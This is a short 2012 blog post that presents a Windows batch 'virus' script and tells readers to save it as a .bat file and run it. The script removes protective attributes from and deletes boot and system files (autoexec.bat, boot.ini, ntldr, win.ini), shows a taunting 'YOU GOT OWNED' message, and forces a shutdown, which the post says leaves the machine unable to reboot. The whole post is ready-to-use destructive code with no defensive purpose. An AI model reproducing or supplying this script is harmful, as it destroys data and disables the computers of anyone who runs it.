Friday, June 29, 2012

Virus that crashesh your own pc


Coding:-

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


save as bat file in notepad!! This will pop up a message saying OWNED!! and shut down the computer never to reboot again! Type this in notepad start virus.bat virus.bat

No comments:

Post a Comment